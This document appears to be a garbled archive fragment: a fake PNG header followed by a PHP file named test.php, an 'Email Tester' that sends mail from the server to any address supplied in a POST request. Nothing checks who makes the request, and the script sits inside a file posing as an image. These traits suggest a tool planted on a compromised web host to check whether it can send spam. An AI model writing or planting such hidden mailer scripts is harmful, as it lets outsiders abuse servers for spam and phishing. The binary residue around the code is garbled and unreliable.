? PNG %k25u25%fgd5n!home/magimcti/public_html/test.php000064400000001312151635743070013270 0ustar00Email Tester [Sending test].


'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")"," [Sending test]."); echo 'Send an report to ['.$_POST['email'].'] - ID: '.$rand.''; echo ''; } ?>